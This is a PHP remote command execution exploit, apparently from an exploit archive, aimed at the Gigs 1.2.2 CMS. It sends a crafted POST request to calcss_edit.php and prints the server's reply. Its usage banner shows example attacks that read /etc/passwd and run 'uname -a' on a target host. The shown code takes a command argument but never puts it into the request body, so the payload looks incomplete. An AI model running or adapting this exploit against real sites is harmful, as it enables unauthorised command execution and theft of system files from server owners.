* ---------------------------------------------------------------- * Fix * * * */ error_reporting(0); $host = explode('/',$argv[1]); $exec = $argv[2] or usage(); $sock = fsockopen($host[0],80); $post = "content="; $leng = strlen($post); $data = "POST /{$host[1]}/calcss_edit.php HTTP/1.1\r\n". "Host: {$host[0]}\r\n". "User-Agent: Lynx (textmode)\r\n". "Content-Type: application/x-www-form-urlencoded\r\n". "Accept-Encoding: text/plain\r\n". "Content-Length: {$leng}\r\n\r\n{$post}\r\n\r\n"; fputs($sock,$data); while(!feof($sock)) { $html .= fgets($sock); } fclose($sock); echo $html; function usage() { print_r(' ------------------------------------------------------- 2532|Gigs 1.2.2 Stable Remote Command Execution Exploit ------------------------------------------------------- by athos - staker[at]hotmail[dot]it works regardless php.ini settings Usage: php xpl.php [host/path] [command] php xpl.php localhost/cms cat ../../../etc/passwd php xpl.php localhost/cms "uname -a" '); exit(0); } ?>